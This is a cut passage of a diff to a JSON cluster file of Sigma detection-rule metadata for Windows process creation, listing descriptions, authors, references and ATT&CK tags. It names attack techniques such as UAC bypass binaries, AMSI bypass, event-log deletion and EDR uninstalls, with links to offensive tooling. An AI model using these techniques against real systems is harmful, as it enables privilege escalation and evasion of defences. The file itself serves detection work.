"https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", - "value": "PsExec Tool Execution" - }, - { - "description": "Detects the use of RunXCmd tool for command execution", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "meta": { "author": "Florian Roth", - "creation_date": "2022/01/24", + "creation_date": "2022/06/07", "falsepositive": [ - "Legitimate use by administrators" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], - "filename": "proc_creation_win_tool_runx_as_system.yml", + "filename": "proc_creation_win_archiver_iso_phishing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.d7xtech.com/free-software/runx/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "93199800-b52a-4dec-b762-75212c196542", - "value": "RunXCmd Tool Execution As System" - }, - { - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "meta": { - "author": "frack113", - "creation_date": "2022/02/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_tor_browser.yml", - "level": 
"high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.003" - ] - }, - "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", - "value": "Tor Client or Tor Browser Use" - }, - { - "description": "Detect use of TruffleSnout.exe", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_trufflesnout.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", - "https://github.com/dsnezhkov/TruffleSnout", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ] - }, - "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "value": "Launch TruffleSnout Executable" - }, - { - "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.", - "meta": { - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, omkar72", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" - ], - "filename": "proc_creation_win_trust_discovery.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", - "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ] - }, - "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", - "value": "Domain Trust Discovery" - }, - { - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", - "https://github.com/hfiref0x/UACME", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", 
- "value": "UAC Bypass Using ChangePK and SLUI" - }, - { - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", - "value": "UAC Bypass Using Disk Cleanup" - }, - { - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "meta": { - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate use of cmstp.exe utility by legitimate user" - ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", - "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ] - }, - "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", - "value": "Bypass UAC via CMSTP" - }, - { - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "value": "UAC Bypass Using Consent and Comctl32 - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": 
"proc_creation_win_uac_bypass_dismhost.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", - "value": "UAC Bypass Using DismHost" - }, - { - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944", - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" - ] - }, - "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", - "value": "UAC Bypass Using Event Viewer RecentViews" - }, - { - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "meta": { - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate use of fodhelper.exe utility by legitimate user" - ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "value": "Bypass UAC via Fodhelper.exe" - }, - { - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", - "value": "UAC Bypass via Windows Firewall Snap-In Hijack" - }, - { - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "meta": { - "author": "Florian Roth", - "creation_date": 
"2022/09/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", - "value": "UAC Bypass via ICMLuaUtil" - }, - { - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Wh04m1001/IDiagnosticProfileUAC", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", - "value": "UAC Bypass Using IDiagnostic Profile" - }, - { - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" - 
], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", - "value": "UAC Bypass Using IEInstal - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "value": "UAC Bypass Using MSConfig Token Modification - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", - "value": "UAC Bypass Using NTFS Reparse Point - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - 
"Unknown" - ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "value": "UAC Bypass Using PkgMgr and DISM" - }, - { - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_winsat.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "value": "UAC Bypass Abusing Winsat Path Parsing - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_wmp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": 
"0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "value": "UAC Bypass Using Windows Media Player - Process" - }, - { - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown sub processes of Wsreset.exe" - ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://www.activecyber.us/activelabs/windows-uac-bypass", - "https://twitter.com/ReaQta/status/1222548288731217921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", - "value": "Bypass UAC via WSReset.exe" - }, - { - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://github.com/hfiref0x/UACME", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - ], - 
"tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "value": "UAC Bypass WSReset" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/09/25", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_ultraviewer.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", - "value": "Use of UltraViewer Remote Access Software" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "meta": { - "author": "frack113", - "creation_date": "2022/10/02", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_ultravnc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", - "value": "Use of UltraVNC Remote Access Software" - }, - { - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "meta": { - "author": "frack113", - "creation_date": "2021/07/12", - "falsepositive": [ - "Uninstall by admin" - ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "value": "Uninstall Crowdstrike Falcon" - }, - { - "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", - "meta": { - "author": "frack113", - "creation_date": "2022/01/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uninstall_sysmon.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "value": "Uninstall Sysinternals Sysmon" - }, - { - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" + "https://twitter.com/1ZRR4H/status/1534259727059787783", + "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" ], "tags": [ "attack.initial_access", - "attack.t1133" + "attack.t1566" ] }, - "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "value": "Unusual Child Porcess of dns.exe" + "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "value": "Phishing Pattern ISO in Archive" }, { - "description": "Detects suspicious parent process for cmd.exe", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/21", + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/05/06", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_unusual_parent_for_cmd.yml", - "level": "medium", + "filename": 
"proc_creation_win_cobaltstrike_bloopers_cmd.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" ], "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003" ] }, - "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "value": "Unusual Parent Process for cmd.exe" + "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "value": "Operator Bloopers Cobalt Strike Commands" }, { - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "description": "Detects suspicious command lines used in Covenant luanchers", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/06/04", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_covenant.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml" ], 
- "filename": "proc_creation_win_user_discovery_get_aduser.yml", + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1564.003" + ] + }, + "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "value": "Covenant Launcher Indicators" + }, + { + "description": "Detects command that is used to disable or delete Windows eventlog via logman Windows utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/11", + "falsepositive": [ + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" + ], + "filename": "proc_creation_win_susp_disable_eventlog.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/nt/logman.html", + "https://twitter.com/0gtweet/status/1359039665232306183?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" + ] + }, + "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "value": "Disable or Delete Windows Eventlog" + }, + { + "description": "Detects attempts to disable AMSI in the command line. 
It is possible to bypass AMSI by disabling it before loading the main payload.", + "meta": { + "author": "@Kostastsale", + "creation_date": "2022/11/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ] + }, + "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe", + "value": "PowerShell AMSI Bypass Pattern" + }, + { + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_formbook.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", + "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", + "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "value": "Formbook Process Creation" + }, + { + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tscon_localsystem.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "9847f263-4a81-424f-970c-875dab15b79b", + "value": "Suspicious TSCON Start as SYSTEM" + }, + { + "description": "Extexport.exe loads dll and is 
